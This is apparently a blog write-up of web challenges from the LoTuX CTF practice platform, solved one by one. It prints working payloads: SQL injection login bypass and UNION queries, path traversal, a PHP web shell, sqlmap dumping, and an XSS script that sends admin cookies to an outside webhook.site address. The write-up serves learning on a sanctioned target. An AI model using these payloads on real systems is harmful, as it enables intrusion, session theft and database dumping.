LoTuX CTF WriteUp-Web

William Lin

2023-09-20

CTF, LFI, RCE, SQL Injection, Web Security, XSS, backdoor, loTuX CTF

Before all

I start my challenges on LoTuX CTF from May, and I’ve solved most of the Web and Cryptography Challenges on this platform now, down below are my WPs :)
LoTuXCTF.com

Write Up

HTML

An e4sy challenge, start with a veiw source~

<!DOCTYPE html>
<html>
  <head>
    <title>Welcome!</title>
  </head>
  <body>
    <header>
      <h1>Welcome!</h1>
    </header>
    This is my very first page,and there are nothing. 
    <br><br>
    <button onclick="cat()" hidden> Check out my second page </button>
    <script>
        function cat(){
            window.location.href = "cat.html";
        }
        function magic(){
          window.location.href = "secret.html";
        }
    </script>
  </body>
</html>

there were two hidden bottons doing functions cat() and magic(), so I typed it on console.
After that, I entered a page with a title This is a cute cat and a page called secret, and collected two partial flags LoTuX{fR0nT_ and 3nD_h1Dden_.
Finally, inspect the page secret again and there was also a hidden page which its path was flag.html.
Opened flag.html, and got the last part of flag Mes54ge}.

Usefull tools

Also a starter one
First I just opened the webpage and found out a hint called burp5u17e_ch4ll3nge
So I opened Burp Suite and caught a packet,and the header had an option called challenge with a value 0, so I just changed it into 1 and got a partial flag LoTuX{bd244966385a624 and a hint told me to use curl.
Next, sent a curl payload:

1	curl http://lotuxctf.com:20001/cur1_ch4ll3nge

And received these informations:

1	{"error":"Error","hint":"How to view headers?"}

So I changed the payload into this:

1	curl -i http://lotuxctf.com:20001/cur1_ch4ll3nge

And some informations appeared:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:47:56 GMT
Connection: close
Content-Type: application/json
Content-Length: 48
Hint: In an HTTP request, there is an important element called the request method. If the server allows any requests methods other than GET, how can we know which other methods are allowed by the server?

{"error":"Error","hint":"How to view headers?"}

So I used a OPTIONS to get its http method options, but nothing appeared, so I added an -i to my payload and saw the headers:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:51:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Allow: HEAD, GET, H1DD3N_HT7P_ME7H0D, OPTIONS
Content-Length: 0

well… there was an option called H1DD3N_HT7P_ME7H0D, just sent a payload with it and I got the second part of flag:

1	curl -i -X H1DD3N_HT7P_ME7H0D http://lotuxctf.com:20001/cur1_ch4ll3nge

received datas:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:52:55 GMT
Connection: close
Content-Type: application/json
Content-Length: 31
Flag2: 6c007b36cb1719bcc21c2ac

{"next":"/r3que57s_ch4ll3nge"}

partial flag and a hint told me to try python request, this was my payload:

import requests as req

s = req.Session()

s.get('http://lotuxctf.com:20001/r3que57s_ch4ll3nge')
print(s.post('http://lotuxctf.com:20001/r3que57s_ch4ll3nge').text)

And FINALLY ended, quite a little bit tired bruh

1	{"flag3":"9997b6814310506060199a6aa4}","next":"https://www.youtube.com/watch?v=dQw4w9WgXcQ"}

A site contained some meme cats, the links of the pictures were interseting:

1	http://lotuxctf.com:20003/4310.jpg

So I used gobuster to crack the paths from 0000 to 9999 :

1	gobuster dir --url http://lotuxctf.com:20003/ -w 0000_to_9999

There was a hidden image:

1	http://lotuxctf.com:20003/6166.jpg

With the word written on it(spin cat), just opened the path: http://lotuxctf.com:20003/spin.php, there’s a base 64 value aGFwcHk= on the button, changed it into the base64 of “spin”
And there’s cute flag~~~
LoTuX{Th3reR2kinds0fc4tv1dEos}

forum

First of all, I logged in as user with the account/password provided
Ok, there were some posts but only admin can edit it…
So I back to the login page and bypass the password with a simple SQL Injection payloads:

1 2	account:admin'# password:a

Aha, logged in successful and got the second(?!) part of flag at the first post…

1	Flag 2/2 : _vu1ner4biliTy}

So.. where’s my first flag XD
I was just stucked by here after ten minutes, I found out the first flag is at post0.php…

1	Flag 1/2:LoTuX{S0_Much

What an IDOR 🙃

An message board Web app which you can let the admin visit your post at your homepage.
I just used a xss payload down below and steal cookies with webhook.site.

1
2
3

<script>
fetch('https://webhook.site/a834359c-ba8f-4762-890c-fbfc9f48688a?cookie='+document.cookie);
</script>

and clicked “share to admin”, back to the webhook site and got the flag~~
BTW, there’s also a XSS payload written in php if the site has some other protections:

<?php
foreach($_COOKIE as $key => $value){
system("echo $key >> logger.txt");
system("echo $value>> logger.txt");
}
?>

and check the path logger.txt

session
4bc94b4a-235e-43f8-88db-836a21466279.PYAiiRxKXmymNY5ivwjz_NMsxqE
PHPSESSID
234a3e6a721faf88e21700d4b9043765
TOP_SECRET
LoTuX{XSS_ch4ll3nGe_For_8abYs}

Over!!!

LoTuX CTF Min 0

First, I used githacking to get the git file:

1	githacker --url http://lotuxctf.com:20006/.git/ --output-folder .

Then I moved to the file and checked out the logs:

git log

Response:

commit 2e2da5c31bcce34a4b5019cf8ab45987a8dcca22 (HEAD -> master, origin/master, origin/HEAD)
Author: Curious-Lucifer <curious.lucifer.domini@gmail.com>
Date:   Sat Aug 12 20:25:01 2023 +0800

    Finish

commit e9dea4d8d3c8b8b24bcb031649fc0421d330b762
Author: Curious-Lucifer <curious.lucifer.domini@gmail.com>
Date:   Sat Aug 12 20:24:24 2023 +0800

    commit

Reset to the previous one:

1	git reset --hard HEAD^

there was a file: init.sql, I found the flag and also a sql injection for LoTuX CTF Min 1
flag:
LoTuX{Why_1s_thi$_per50n_sO_c4r3le5s?}

LoTuX CTF Min 1

By sql injection found at challenge 0, I used a UNION BASE SQL Injection Payload as a user name to register

1	' UNION SELECT concat(id), concat(tag), concat(content), NULL FROM secret #

And I got the flag.
LoTuX{Wh4t_@_maRv3l0u5_de$1gn_7h1s_1s?!?}

Blank Site 1

A BLANK site with only a picture, check out the url of it:

1	http://lotuxctf.com:20007/uploads?file=BlankSite.png

Maybe a LFI?

1	http://lotuxctf.com:20007/uploads?file=../app.py

Aha! down below are the contents of it:

from flask import *

app = Flask(__name__)

@app.get('/')
def index():
    return render_template('index.html')

@app.get('/uploads')
def uploads():
    file = request.args.get("file")
    if "FLAG2" in file:
        return "(≖＿≖)✧"

    return send_file("uploads/" + file)

@app.get('/1d538e83d6f6b08f')
def secret():
    try:
        with open('/proc/sys/kernel/random/boot_id') as f:
            hint = f.readline().strip()
    except:
        hint = ""

    return {"FLAG1": "LoTuX{Wh4t_k1nD_oF_vUln3rabIli7y_fr0m_tHe_l@st_c3ntUrY_i5_thi$?!}", "Hint": hint}

app.run("0.0.0.0", 20007, debug=True)

I got the flag, and also the path '/1d538e83d6f6b08f' to exploit boot id for Blank Site 2.

Image Uploader 1

An image upload web app, just sent a php backdoor XD.

1	<?php system($_GET['cmd']) ?>

I just visited the path and got rce, with simple observation I found out flag.txt(it was at there but now deleted by some auful challengers):

How2Login

Ah, my first thouhgt was like, “well…just a sql injection bypass with 300 points(?!)”.
Nope haha, so I opened my owasp and glimpse a path called test.php
(p.s. It could be found out with dirsearch but my owasp tool did this first XD)
And it was a site to check if user exist, and the link was just like this:

1	http://lotuxctf.com:20010/test.php?username=admin

SQL Injection!!!
I opened sqlmap and used the payload:

1	sqlmap -u http://lotuxctf.com:20010/test.php?username=admin --dump

And it was an Error-BASE SQL Injection and the data was hashed by sha256, but a weak password XD
data dumped:

1 2	account: admin password: P@ssW0rd

Cute Flag: LoTuX{Inj3ct1on&HAAAsh}